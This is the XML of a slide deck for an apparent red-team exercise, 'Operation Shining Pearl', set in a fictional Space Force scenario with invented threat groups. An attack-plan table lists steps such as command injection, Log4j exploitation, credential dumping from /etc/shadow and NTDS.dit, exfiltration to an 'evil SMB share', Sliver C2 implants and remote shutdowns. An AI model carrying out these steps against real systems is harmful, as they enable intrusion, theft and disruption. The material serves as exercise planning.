                    </a:p>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 20.0 + 21.0</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NTDS.dit, LSASS, and SAM data pooled and exfiled from DC02</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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Remote shutdown of all centOS machines</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="lt2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="81507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sudo nmap -A 208.11.26.100 –Pn | Run heavy enumeration on DMZ machine</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run crackmapexec over ssh against the 23.0 subnet to discover vulnerable host</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run crackmapexec over ssh against the 25.0 subnet w/ cracked creds to discover vulnerable host</a:t>
                      </a:r>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Nmap 20.0 + 21.0</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Evil-winrm -u Spatial.rend -p gotem / Upload &amp; run winPEAS.exe</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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Remote shutdown of all windows workstations</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="71992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Exploit FTP anonymous read / write access to upload command injection .ASPX </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Remote into vulnerable machine with lazy_admin.txt creds | discover sudo privileges w/ sudo -l</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Connect to victim then perform basic enumeration</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Perform manual Log4j exploit on DC02</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>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Impacket-psexec using sharphound, zip pooled data, and then export to evil SMB share</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None/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Deface DMZ webserver</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="719925">
                <a:tc rowSpan="3">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Curl command injection to perform basic enumeration, grab sensitive lazy_admin.txt file, and the create evil administrator account for persistence</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Perform sudo awk exploit </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upload and run pspy</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Add spatial.rend</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>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 domain admin account</a:t>
                      </a:r>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Using cracked creds ssh onto one last system and then implant the final beacon</a:t>
                      </a:r>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endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="581475">
                <a:tc vMerge="1"/>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Sliver beacon implant on 23.201</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Exploit tar ball cronjob and give backup account root privileges</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2">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Sliver C2 implant on DC02</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2">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END Red Team OPs / prepare shot val</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="443025">
                <a:tc vMerge="1"/>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cat /etc/shadow | “crack creds” 5 creds total</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A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rPr>
                        <a:t>Sliver c2 beacon implant uploaded &amp; executed</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" u="none" cap="none" strike="noStrike">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:solidFill>
                      <a:srgbClr val="7030A0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1"/>
                <a:tc vMerge="1"/>
                <a:tc v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Operation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shining Pearl</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p2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lang="en"/>
              <a:t>The rise of an aggressive Galarian APT group dubbed SPACIALREND (SPR) has leveraged cyberspace effects on several organizations such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Solarwinds and the Olympics.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Their tactics include destruction, degradation, and denial of space based systems.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 26’s primary mission partner has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>requested the Delta to assist in defending key cyber terrain from a number of threat actors to include SPACIALREND. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4528455" y="2293001"/>
            <a:ext cx="4780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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>Operation: Shining Pearl - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>Operational</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t> Environment</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p3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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operation Shining Pearl is a joint mission encompassing all of Space Force’s Delta 26. Its primary mission partner is requesting the Delta to defend key cyber terrain from a number of highly active threat actors to protect and defend continued launch operations at Cape Canaveral. These threat actors originate from multiple countries: Hisui and Galar. While the threat actors all have different motivations, they all have one common goal: Deny, degrade, disrupt, destroy, and manipulate their targets with physical and real-world effects.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intelligence sources have identified the threat actors have previously targeted the mission partner. The threat actors have had successful attacks against their other targets in the past, including SolarWinds, the Olympics, and the Democratic National Committee.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In response to the growing threat, Delta 26’s commander has ordered a collaborative competition amongst all of its cyber squadrons to defend the key cyber terrain.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With over 70 space launches in 2023 alone, Cape Canaveral is the Premier Launch Site on Earth. A few of these launches were for Delta 26’s mission partner. Launching satellites into Space is the birth of the future national security outlook. Launching satellites today will mean having the high ground tomorrow.</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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>Operation: Shining Pearl - Impact of the Operational Environment</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The operational environment is critical for national security and national interests across the globe. Any disruption or degradation to the mission partner’s assets could be detrimental to the future of national security.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Space Launch mission provides communication, GPS, and ISR capabilities for the warfighter across the globe. In today’s destabilizing environment, pushing more capabilities to Space is now critical more than ever. </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A lack of space launches would mean a lack of communication, GPS, and ISR capabilities. The more capabilities that are launched today will result in a better posturing for tomorrow’s fight.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="11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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Operation: Shining Pearl - Adversary Evaluation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intelligence sources have identified four active advanced persistent threat actors that could potentially have a planned attack against Delta 26’s mission partner: COSMICPOWER, METEORMASH, SPACIALREND, and LUNARDANCE. It is unknown whether or not these threat actors are working together or independently.</a:t>
            </a:r>
            <a:endParaRPr sz="11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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OSMICPOWER</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;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First discovered: 2012</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Notable Events</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2011-2021: Data breach against commercial airliner, Air India</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2021-2022: Compromise of at least 6 U.S. State Government Networks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Expected/previously seen TTPs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keylogging</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Account creation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spearphishing via email</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Known Tools and Malware: Gearshift, Cobalt Strike, China Chopper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METEORMASH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;155;p3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First Discovered: 2021</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Noteable Events:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2021: Gathered information about Guam possibly linked to recent cyber attacks against the U.S. territory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Expected/Reported TTPs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Living off the land by using what’s available on the host machine</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Remote system discovery via Powershell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Masquerading malware and implants by matching legitimate names</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Known tools and Malware: mimikatz, ping, wevtutil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SPACIALREND</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p3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First Discovered: 2008</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Notable Events</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2015: Compromised Democratic Committee</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2021: Solarwind Compromise</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Expected/Reported TTPs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enumeration techniques such as active directory account discovery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute force via password guessing and password spraying</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lateral movement via domain accounts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Known tools and Malware: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Sliver, Bloodhound, Mimicatz</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